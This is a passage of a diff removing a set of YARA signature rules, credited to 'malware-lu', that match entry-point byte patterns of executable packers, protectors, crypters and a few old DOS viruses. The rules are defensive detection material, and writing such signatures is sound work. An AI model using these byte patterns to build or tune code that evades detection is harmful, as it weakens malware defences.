-		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 70 3B 00 10 E8 3C FA FF FF 33 C0 55 68 6C 3C 00 10 64 FF 30 64 89 20 6A 0A 68 7C 3C 00 10 A1 50 56 00 10 50 E8 D8 FA FF FF 8B D8 53 A1 50 56 00 10 50 E8 0A FB FF FF 8B F8 53 A1 50 56 00 10 50 E8 D4 FA FF FF 8B D8 53 E8 D4 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 64 56 00 10 E8 25 F6 FF FF B8 64 56 00 10 E8 13 F6 FF FF 8B CF 8B D6 E8 E6 FA FF FF 53 E8 90 FA FF FF 8D 4D EC BA 8C 3C 00 10 A1 64 56 00 10 E8 16 FB FF FF 8B 55 EC B8 64 56 00 10 E8 C5 F4 FF FF B8 64 56 00 10 E8 DB F5 FF FF E8 56 FC FF FF 33 C0 5A 59 59 64 89 10 68 73 3C 00 10 8D 45 EC E8 4D F4 FF FF C3 E9 E3 EE FF FF EB F0 5F 5E 5B E8 4D F3 FF FF 00 53 45 54 ?? ?? ?? ?? 00 FF FF FF FF 08 00 00 00 76 6F 74 72 65 63 6C 65 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEPackv099
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV115V117LZMA430ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 83 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB 14 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxQuake518
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? ?? ?? ?? ?? B8 21 35 CD 21 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv305c4UnextractableVirusShield
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 05 40 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium13013ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV130XObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MetrowerksCodeWarriorv20Console
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 55 B8 FF FF FF FF 50 50 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule PESpinv07Cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimpleUPXCryptorV3042005MANtiCORE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinRAR32bitSFXModule
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule iPBProtect013017forgot
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeASPack211demadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv036alphaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { AB E2 E5 5D 59 8B 76 68 51 59 46 AD 85 C0 }
-
-condition:
-		$a0
-}
-	
-	
-rule CrinklerV03V04RuneLHStubbeandAskeSimonChristensen
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 00 00 42 00 31 DB 43 EB 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DingBoysPElockPhantasmv10v11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactV2XBitsumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CRYPTVersion17cDismember
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0E 17 9C 58 F6 ?? ?? 74 ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxXPEH4768
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5B 81 ?? ?? ?? 50 56 57 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? ?? B8 01 00 50 B8 ?? ?? 50 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECrypt32v102
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5B 83 ?? ?? EB ?? 52 4E 44 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PESHiELD025Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NETDLLMicrosoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 ?? 00 00 FF 25 }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRH
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF 0F 00 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BeRoEXEPackerv100DLLLZMABeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02ExeSmasherAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ObsidiumV125ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv107bDLLAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MicroJoiner17coban2k
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 00 10 40 00 8D 5F 21 6A 0A 58 6A 04 59 60 57 E8 8E 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeVOBProtectCDFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 5F 81 EF 00 00 00 00 BE 00 00 40 00 8B 87 00 00 00 00 03 C6 57 56 8C A7 00 00 00 00 FF 10 89 87 00 00 00 00 5E 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CelsiusCrypt21Z3r0
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 84 92 44 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 84 92 44 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D C4 92 44 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D AC 92 44 00 89 E5 5D FF E1 90 90 90 90 55 89 E5 5D E9 77 C2 00 00 90 90 90 90 90 90 90 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
-	$a1 = { 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule Armadillov260
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov261
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakeASPack212emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RatPackerGluestub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CreateInstallv200335
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 81 EC 0C 04 00 00 53 56 57 55 68 60 50 40 00 6A 01 6A 00 FF 15 D8 80 40 00 8B F0 FF 15 D4 80 40 00 3D B7 00 00 00 75 0F 56 FF 15 B8 80 40 00 6A 02 FF 15 A4 80 40 00 33 DB E8 F2 FE FF FF 68 02 7F 00 00 89 1D 94 74 40 00 53 89 1D 98 74 40 00 FF 15 E4 80 40 }
-
-condition:
-		$a0
-}
-	
-	
-rule SPECb3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SPECb2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01MicrosoftVisualBasic5060Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXModifiedStubbFarbrauschConsumerConsulting
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule E2CbyDoP
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? BF ?? ?? B9 ?? ?? FC 57 F3 A5 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SVKProtectorv111
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCShrinkerv071
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite21
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }
-
-condition:
-		$a0
-}
-	
-	
-rule BeRoEXEPackerv100DLLLZBRRBeRoFarbrausch
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule hmimysPackerV12hmimys
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 95 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 5E AD 50 AD 50 97 AD 50 AD 50 AD 50 E8 C0 01 00 00 AD 50 AD 93 87 DE B9 ?? ?? ?? ?? E3 1D 8A 07 47 04 ?? 3C ?? 73 F7 8B 07 3C ?? 75 F3 B0 00 0F C8 05 ?? ?? ?? ?? 2B C7 AB E2 E3 AD 85 C0 74 2B 97 56 FF 13 8B E8 AC 84 C0 75 FB 66 AD 66 85 C0 74 E9 AC 83 EE 03 84 C0 74 08 56 55 FF 53 04 AB EB E4 AD 50 55 FF 53 04 AB EB E0 C3 8B 0A 3B 4A 04 75 0A C7 42 10 01 00 00 00 0C FF C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EnigmaProtector131Build20070615DllSukhovVladimirSergeNMarkin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 81 ED ?? ?? ?? ?? E9 49 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8A 84 24 28 00 00 00 80 F8 01 0F 84 07 00 00 00 B8 ?? ?? ?? ?? FF E0 E9 04 00 00 00 ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 81 C0 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 30 10 40 49 0F 85 F6 FF FF FF E9 04 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PureBasicDLLNeilHodgson
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 7C 24 08 01 75 ?? 8B 44 24 04 A3 ?? ?? ?? 10 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HPA
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 8B D6 83 ?? ?? 83 ?? ?? 06 0E 1E 0E 1F 33 FF 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov310
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upack012betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 48 01 40 00 AD ?? ?? ?? A5 ?? C0 33 C9 ?? ?? ?? ?? ?? ?? ?? F3 AB ?? ?? 0A ?? ?? ?? ?? AD 50 97 51 ?? 87 F5 58 8D 54 86 5C ?? D5 72 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B6 5F FF C1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxNcuLi1688
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0E 1E B8 55 AA CD 21 3D 49 4C 74 ?? 0E 0E 1F 07 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtectorvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C }
-	$a1 = { 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 00 47 44 49 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 53 6C 65 65 70 00 00 00 47 65 74 56 65 72 73 69 6F 6E 00 00 00 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65 41 00 00 00 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F 41 00 00 00 47 65 74 41 43 50 00 00 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 47 65 74 44 43 00 00 00 52 65 6C 65 61 73 65 44 43 00 00 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 00 00 44 65 73 74 72 6F 79 57 69 6E 64 6F 77 00 00 00 53 65 74 50 69 78 65 6C 00 00 00 00 }
